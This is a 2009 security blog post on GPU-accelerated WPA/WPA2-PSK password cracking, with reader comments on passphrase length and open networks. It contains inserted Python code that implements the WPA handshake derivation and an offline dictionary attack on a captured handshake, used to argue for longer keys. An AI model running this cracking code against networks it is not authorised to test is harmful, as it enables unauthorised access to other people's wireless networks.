
Zero Day

Ryan Naraine, Emil Protalinski and Dancho Danchev

GPU-Accelerated Wi-Fi password cracking goes mainstream

By Dancho Danchev | January 22, 2009, 1:09pm PST


No weak password can survive a GPU-accelerated password recovery attack. Elcomsoft's Wireless Security Auditor, released last week, is designed to shorten the time it takes a network administrator to pen-test the strength of the WPA/WPA2-PSK passphrases used on a wireless network. Its core feature, cutting the recovery time by up to a hundred times depending on the GPU used, will just as naturally empower unethical wardrivers to guess 8-character passphrases that can no longer be considered secure. The cost of each guess is fixed by the WPA key derivation (4096 iterations of HMAC-SHA1 per candidate passphrase), and because every candidate is independent of the others, the work spreads almost perfectly across the hundreds of cores in a modern GPU.

What is particularly interesting about Wireless Security Auditor is that it performs the password recovery entirely offline, from a captured handshake, instead of noisily brute forcing the access point itself. The network owner sees nothing beyond the one client association the attacker had to sniff:

“Elcomsoft Wireless Security Auditor works completely off-line, undetectable by the Wi-Fi network being probed, by analyzing a dump of network communications in order to attempt to retrieve the original WPA/WPA2-PSK passwords in plain text. Elcomsoft Wireless Security Auditor requires a valid log of wireless communications in standard tcpdump format. The tcpdump format is supported by all commercial Wi-Fi sniffers. In order to audit your wireless network, at least one handshake packet must be present in the tcpdump file.”

Meanwhile, pen-testing companies have once again urged IT managers and end users to go beyond the 8-character password strength myth and to anticipate the risks posed by the increasingly efficient password recovery solutions hitting the market:

David Hobson said: “It’s a wake-up call to IT managers, pure and simple. IT managers should now move to 12 and even 16 character keys as a matter of urgency. It’s not very user-friendly, but the potential consequences of staying with eight character keys do not bear thinking about.”
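The offline handshake check that Elcomsoft describes, together with the 8-versus-12-versus-16 character argument Hobson makes, as a worked example. This is added illustration code, not Elcomsoft's product or anything from the original post: it implements the standard WPA/WPA2-PSK derivation (PBKDF2 to the PMK, the 802.11i PRF to the PTK, the EAPOL-Key MIC over message 2) and runs a dictionary attack against a captured handshake without ever touching the network. The SSID, MAC addresses, nonces and the handshake itself are constructed inline rather than parsed from a real tcpdump capture, and the guess rate used for the key-length table is an assumed placeholder, not a measurement of any hardware.

```python
import hashlib
import hmac
import math
from typing import Optional

# Constructed sample network parameters (not a real capture). In practice these come
# from the beacon/association frames and the four-way handshake found in the pcap.
SSID = b"ZDNet-Test"
AP_MAC = bytes.fromhex("02aabbccddee01")
STA_MAC = bytes.fromhex("02112233445501")
ANONCE = bytes(range(32))          # nonce sent by the AP in message 1
SNONCE = bytes(range(32, 64))      # nonce sent by the client in message 2
MIC_OFFSET = 81                    # 4-byte EAPOL header + 77 bytes of key-descriptor fields
MIC_LEN = 16


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Almost all of the per-guess cost lives here, which is what the GPU parallelizes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output, truncated to 64 bytes
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def build_msg2_frame(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """EAPOL-Key frame for handshake message 2 (RSN descriptor, key-info 0x010a = MIC bit set,
    pairwise, descriptor version 2 = HMAC-SHA1-128). Key data is left empty in this sample."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 7 + b"\x01"
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC = HMAC-SHA1(KCK, frame with its MIC field zeroed), truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def forge_handshake(passphrase: bytes) -> dict:
    """Build the constructed 'capture' a sniffer would have recorded for this passphrase."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, build_msg2_frame(SNONCE))
    return {"ssid": SSID, "ap": AP_MAC, "sta": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": build_msg2_frame(SNONCE, mic)}


def candidate_matches(hs: dict, passphrase: bytes) -> bool:
    """One offline guess: derive PMK -> PTK -> KCK and compare the recomputed MIC."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, hs["ssid"]),
                       hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])[:16]
    captured = hs["eapol"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), captured)


def crack(hs: dict, wordlist) -> Optional[bytes]:
    """Dictionary attack against the captured handshake; nothing is ever sent to the network."""
    for word in wordlist:
        # WPA passphrases are 8..63 ASCII characters, so anything else is skipped
        if 8 <= len(word) <= 63 and candidate_matches(hs, word):
            return word
    return None


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a uniformly random passphrase of the given length over the given alphabet."""
    return length * math.log2(alphabet_size)


def years_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time for a full brute-force sweep at the given (assumed) guess rate."""
    return alphabet_size ** length / guesses_per_second / (365 * 86400)


if __name__ == "__main__":
    hs = forge_handshake(b"zdnet2009!")   # constructed secret; crack() never reads it directly
    print("recovered:", crack(hs, [b"letmein1", b"Password1", b"zdnet2009!"]))
    rate = 1e5  # assumed illustrative guess rate, not a measurement of any CPU or GPU
    for n in (8, 12, 16):
        print(n, "random chars over 62:", round(keyspace_bits(62, n), 1), "bits,",
              f"{years_to_exhaust(62, n, rate):.3g} years at {rate:.0e} guesses/s")
```

The point the table drives home is Hobson's: each extra random character multiplies the sweep time by the alphabet size, so going from 8 to 12 characters adds roughly 24 bits (about sixteen million times more work) and no foreseeable speed-up in the recovery tool makes that up. A real tool swaps the wordlist loop for a GPU kernel and the constructed dictionary for a pcap parser; the verification logic is the same.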

As previously discussed, best-practice wake-up calls remain largely ignored, prompting radical solutions in countries like India, which recently announced that a wardriving police unit will locate insecure wireless networks and notify their owners in order to “prevent the commission of a cognizable offense”.


Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.


35 Comments

RE: GPU-Accelerated Wi-Fi password cracking goes mainstream
birumut Updated - 4th May 2011
Great!!! thanks for sharing this information to us!
8? 12? 16? In a business?
MGP2 Updated - 22nd Jan 2009
Hell, my own key is 20 characters AT HOME! I would hope any sensible IT manager would use way more than 8!

And my router password is 13 characters.
user issues
mikey3211 22nd Jan 2009
The biggest problem I've found in attempting strong passwords is the yelling and screaming of users, in particular senior and executive management. The average user just grumbles and puts up with it but several senior and executive staff where I work are insulted that they have to do the same stuff as everyone else.

It took me 8 months of serious battling to allow me to take an 8-12 character alpha-only password up to 8+ base64 password combo. And that only changed when I was able to 'hack' the CEO's laptop by using a bluetooth enabled video camera.
Humm
CobraA1 23rd Jan 2009
Humm, well, in this case, it's the wi-fi password, so it's not an everyday password needed to login.

But - point taken. I personally don't have the real world experience you have (finishing up college), but I am aware that yes, sometimes users can be a bit of a pain, especially when it comes to passwords.
Tokens
JT82 23rd Jan 2009
The heart of the article is for Wi-Fi PSKs, but for general logons, that's why tokens (RSA SecurID, smart cards, USB keys) are the way to go. Makes a very secure password, usually secured by a 6-8 digit PIN (again usually with a three-strikes-you're-out rule to lock the token). To get back to the Wi-Fi PSK, I personally use 50ish alpha-numeric + special character, randomized, at the WPA2-only level...but WPA2-ENT (802.1x authentication via certificate) seems the best way to go.
Tell me why I should password secure my home wifi again? Does sharing slow down my bandwidth?
Seriously...? The harm?
Yes.
CobraA1 Updated - 22nd Jan 2009
"Tell me why I should password secure my home wifi again?"

Depends - for many people, it also acts like a hardware router. If the hackers can hack it, they can redirect packets. This is a spammer's dream come true.

"Does sharing slow down my bandwidth?"

Yes. Duh. Unless you have infinite bandwidth, this is like asking if 1+1=2.
Responsible networking
JT82 23rd Jan 2009
Well, for you specifically, maybe - maybe not. Now if you have Comcast or another cable system, you could be harming the other users by letting everyone else use your HSI connection to download what they wish (oh and be advised, you'll be left holding the bag for whatever crosses your pipes).

Enabling encryption on your device (if it's of ANY quality) will give you a negligible impact on performance. I have a 50ish character WPA2 (AES-CCMP), alpha-numeric, special symbols, etc - and randomized - and I have no performance issues.
Kiddie porn and illegal file sharing of copyrighted media files. If you leave your network unsecured, anyone with access can download the aforementioned files and it's your modem that will be identified to your ISP. That enough to scare you into securing your network?
Legal problems too...
pico_D 27th Jan 2009
As the others have said, it does rob you of bandwidth and allows people to spam from your location...

But in some places (like here in Germany), you are legally responsible for everything that travels over your DSL connection. If they spam or upload kiddie-pr0n, share music etc. and you haven't kept a security log of who accessed your network, when and what they did, you are legally responsible:

If you have an open wi-fi network, you are considered to be acting as a service provider and have the same responsibilities - keeping track of who used your network and what they were doing.

I don't know how that is treated in the States, but if you end up with the RIAA beating your door down, asking for money, you won't have a fall back, unless you can show evidence that somebody else was sending/receiving the music over your connection - and that is one of the less scary scenarios... Better than the police or FBI smashing your door down, dragging you away and confiscating your equipment etc... :-S
Guilty until proven innocent
AzuMao Updated - 28th Jan 2009
Good ol' justice systems!

So I could just sneak into someone's house, download kiddie porn on their computer, and as long as I didn't leave any fingerprints, hair, etc., they would get sent off to prison and nothing would happen to me?


Mmm.

This system really rocks. The law definitely hurts criminals not good guys.


[/sarcasm]
Figured I should add this tag since some people are too stupid to get that I was being sarcastic..
I think a lot of tech types really overestimate how important security is for home networks.
Most users set up their network so they can access the internet from several different computers, and don't have it set up to access different devices within their network. In this way, it's just like having a direct connection to the internet without wifi.
And for most users, it's not going to make any difference to their performance if someone else is sharing their connection. I could have my whole street hopping on my router and it wouldn't make a difference.
Kiddie porn??? If your next door neighbor is downloading kiddie porn, you probably have bigger issues to be concerned about (like the fact that your neighbor is a pedophile).
Finally, charges for excess usage - how about nationalizing the ISPs? If they can't handle it, maybe they should get into a different business.
Neighbor?
AzuMao 24th Feb 2009
You are either extremely deluded, extremely confused, or both.


Let me try to put it simply for you.


People can just drive by your house anonymously, without even exiting their vehicle, download/upload whatever they want through your connection, and drive away, before you even knew what happened. If any of this was illegal, expect the feds to show up at your door shortly after.


Does that put things into proportion better?
Well . . .
CobraA1 22nd Jan 2009
Well, since this is the Wi-Fi password we're talking about, I use a completely random, generated password at the maximum length. Windows stores it and never forgets it anyways, so there's really no need to make it something easy to memorize.
other than having someone stealing the bandwidth that you're paying for, there is also the possibility that the person using your bandwidth may be doing nasty stuff. Depending on the local laws where you are, you (as the account holder) may be considered either complicit or partially liable in any crime in a civil court that the leecher may do as your network is open.
what about LAN ?
it2009 22nd Jan 2009
Is this specific to wifi or can something similar be used on a wired LAN (by dishonest employees)?

Also, is 8 too short when randomly generating passwords with mixed-case letters, digits and special characters (for Windows and *nix sessions)?
re: LAN
CobraA1 22nd Jan 2009
"Is this specific to wifi or can something similar be used on a wired LAN (by dishonest employees)?"

This particular example is specific to wireless - the encryption is needed because radio waves can be detected from a distance and, unlike a cable, you're not in total control of its range and where you can access it. The encryption, therefore, acts like a virtual "wire", only allowing people who are allowed to access the network to access it.

However, the ability to use GPUs to accelerate brute force cracking can be generalized, so yeah this can theoretically be used anywhere where an offline attack is available.

"Also, is 8 too short when randomly generating passwords with mixed-case letters, digits and special characters (for Windows and *nix sessions)?"

Even without this technique, 8 characters is a minimum, and to be honest, it's getting to be pretty weak. If you had 256 characters to choose from (and that's being extremely generous), then that's 64 bits. For many encryption algorithms, that may not be enough - it's much safer to have a 128 bit or larger key.
Depends
Suicida| 26th Jan 2009
Windows:

If you aren't storing the LM Hash, and you are using the highest lanman level "NTLMv2 only - Refuse LM & NTLM" then you are pretty safe as long as you aren't using lame passwords.

In Linux use fail2ban it will monitor /var/log/secure and configure iptables to ban the offending ip address.
Authentication is important
ahahum@... 22nd Jan 2009
Any enterprise network should use WPA/WPA2 with RADIUS authentication to a user database. Anything less, would be very irresponsible of the IT department. It's not that hard to setup and there are plenty of guides on the internet to assist.
RE: GPU-Accelerated Wi-Fi password cracking goes mainstream
Usernameisalreadyinuse,please 22nd Jan 2009
DAAAAAM talk about old news, this would have been a cool article had it come out 6 months ago.

As for the "undetectable offline" attack, that is the only way I know of actually doing it. You need a wpa handshake then you use that packet to test your keys.
DAAAAAM talk about old news, this would have been a cool article had it come out 6 months ago. Agreed. What is the point of this article when there already was a big stink about it in early Sept. 2008. Stay a little bit more current on security issues and this may have been something to read about.
It's quiet in the ZDNET Office today
Alan Smithie 23rd Jan 2009
Have you people got any news ? This story is so old my Grandad told it to me..
what is the big deal?
Word Eater 23rd Jan 2009
PSK means pre-shared key. You only enter it the first time you set up the WiFi on your systems. Make the PSK as long and as complicated as you possibly can and write it down. It would be hard for someone to war drive a notebook in a drawer in your computer room. I usually go for about 32 characters because if I go higher, I start making mistakes when transcribing.
key length
ed.ahlsen-girard@... 23rd Jan 2009
I don't transcribe. I have an encrypted thumb drive, and I cut and paste.
I do that as well.
BillDem 28th Jan 2009
I'm using about a 32 character string when I set up my networked systems, as well. Pre-shared makes it much easier.
I'm not up on wireless issues. If someone can log into your wireless network, can they read all the traffic or access the other computers that are connected? If so, does this mean they can read accounts and passwords for home shopping and the like?
Your bandwidth is the size of your pipe, that will not change, just the amount of data going through this pipe.

Now, let's discuss baddies using your IP-address to download/upload kiddie porn.
Next, let's discuss the next car with baddies hacking your personal PC and infecting it with malware, turning your home PC into a spam churning zombie.
When that car of hoods leaves your hood, the internet banking baddies pull up to sniff your personal data and using your identity/creditcard/bank account for their retail therapy....

Do I really need to go on or does it finally hit home why?
This should be irrelevant for IT departments and end-users. That's because no IT department should be using a single common shared key for every user. If an IT department is using WPA-PSK, the strength of the password is irrelevant because they've got bigger problems trying to keep a common key secret between hundreds of users.

For WPA Enterprise mode, brute force password cracking is not an issue because the password authentication transaction takes place inside an SSL/TLS tunnel.
Let me know when 32 characters
snafu_77 26th Jan 2009
isn't safe and I'll upgrade from my wpa 64 character randomly generated key.

Password Length
FiOS-Dave 28th Jan 2009
The point of diminishing returns approaches when the length of the password is greater than the length of the data.

Sounds like another "Murphy's Law" to me...

Dave
That's not diminishing returns
AzuMao 30th Jan 2009
Diminishing returns would be when the amount of security gained compared to the password length added goes down. E.G. if the password is twice as long but only 10% more secure. That would be diminishing returns.
FireStream?
AzuMao 26th Jan 2009
Obviously the Tesla is going to beat a gaming video card.. let's see how it stacks up against FireStream in this test. Otherwise it's rather pointless.
Wifi police?
osands 29th Jan 2009
"which recently announced that a Wardriving police unit will be locating insecure wireless networks and notifying the owners in order to “prevent the commission of a cognizable offense”."

Two enterprising teens here in Indiana did exactly that. Located houses with insecure networks and offered for a small fee to secure them. Local police arrested them for threatening homeowners with being hacked. No amount of discussion could convince the authorities they were simply looking for business leads.
Duh
AzuMao 30th Jan 2009
This is America. Land of the Government. It's okay as long as the Government is doing it. Otherwise, it's not.